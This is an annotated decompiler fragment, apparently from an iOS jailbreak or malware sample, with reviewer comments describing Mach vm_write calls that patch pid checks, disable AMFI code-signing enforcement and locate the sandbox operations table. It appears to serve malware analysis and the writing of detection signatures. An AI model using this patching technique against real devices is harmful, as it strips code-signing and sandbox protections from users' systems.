// Decompiler pseudo-code, collapsed onto one line in the original page.
// Register names (r0..r11, sp, fp) and stack[N] slots are decompiler artifacts,
// and several of them (r8, r10, r11) are read here before any visible assignment,
// so this is a fragment of a larger routine whose start is not shown.
//
// What the visible statements do: a series of Mach vm_write / vm_read_overwrite
// calls against a task port, interleaved with log messages. The log strings and
// helper names suggest in-memory patching of process-ID checks, AMFI code-signing
// enforcement and the sandbox operations table. That reading is inferred from
// names only and should be confirmed against the helper bodies.
// NOTE(review): the literal log strings below ("where we will write MALWARE to",
// "Hacked FAILED", "patched pid_check", "Found sbops") are stable static
// indicators for matching this sample.

// Logs the destination address held in r10 (format string consumes one value).
_logToFile("where we will write MALWARE to: 0x%08x\n", r10, 0x8, sp + 0x34);
// Two 4-byte writes from the buffer at sp + 0x94 to stack[2019] and stack[2019] + 4,
// in the task named by *r8. The buffer contents are set outside this excerpt.
vm_write(*r8, stack[2019], sp + 0x94, 0x4);
vm_write(*r8, stack[2019] + 0x4, sp + 0x94, 0x4);
r1 = r10;
// Copies 0x10 bytes from the fixed address 0x4fe83 (presumably data embedded in
// this binary; confirm in the image) to the logged destination in task r11.
// This is the only write in the excerpt whose return value is checked.
if (vm_write(r11, r1, 0x4fe83, 0x10) != 0x0) {
    _logToFile("Hacked FAILED\n", r1, 0x4fe83, 0x10);
}
// r8 now points at 0x55dd0; later calls dereference it as the task argument,
// so this is presumably a global holding a task port. TODO confirm.
r8 = 0x55dd0;
// Writes a further 8 bytes from sp + 0x34 immediately after the 0x10-byte region.
vm_write(r11, r10 + 0x10, sp + 0x34, 0x8);
// Sends a message to the default NSNotificationCenter. The selectors come from
// stack slots (stack[2008], stack[2006]) and are not recoverable from this view;
// the NSDictionary is presumably the notification payload. Verify in disassembly.
r5 = [[NSNotificationCenter defaultCenter] retain];
asm { strd r1, r0, [sp, #0xb0 + var_88] };
r4 = [objc_msgSend(@class(NSDictionary), stack[2008]) retain];
r11 = 0x0;
objc_msgSend(r5, stack[2006]);
[r4 release];
[r5 release];
r10 = stack[2010];
r6 = stack[2009];
r5 = stack[2005];
// Helper defined elsewhere; the name suggests it locates a task_for_pid-related
// offset and returns it through sp + 0x24. Not verifiable from this excerpt.
_find_tfp_off(r10, r6, r5, sp + 0x24);
r1 = stack[2011];
r2 = sp + 0x94;
asm { strd fp, fp, [sp, #0xb0 + var_20] };
// Reads 4 bytes at stack[2011] into sp + 0x90, then writes 4 bytes back to the
// same address from sp + 0x94. sp + 0x94 is also the out-size argument of the
// read, so the value actually written is not clear from the decompiler output.
vm_read_overwrite(*r8, r1, 0x4, sp + 0x90, r2);
r4 = sp + 0x94;
vm_write(*r8, stack[2011], r4, 0x4);
// Logged unconditionally: neither the read nor the write above is checked,
// so this message does not prove the patch was applied.
_logToFile("patched pid_check\n", stack[2011], r4, 0x4);
// Helper defined elsewhere; the name suggests it returns the offset of AMFI's
// cs_enforcement_disable flag. The offset is added to r10 (presumably a base
// address loaded from stack[2010]; TODO confirm) and the same read-then-write
// pair is applied at that address, again with no error checking.
r0 = _find_cs_enforcement_disable_amfi();
asm { strd fp, fp, [sp, #0xb0 + var_20] };
vm_read_overwrite(*r8, r0 + r10, 0x4, sp + 0x90, r4);
vm_write(*r8, r0 + r10, sp + 0x94, 0x4);
// Helper defined elsewhere; the name and the log message suggest it locates the
// sandbox policy operations table ("sbops"). The excerpt ends after the lookup
// is logged, so whatever is done with the result lies outside this view.
_find_sbops(r10, r6, r5, sp + 0x90);
_logToFile("Found sbops 0x%08x\n", stack[2038], r5, sp + 0x90);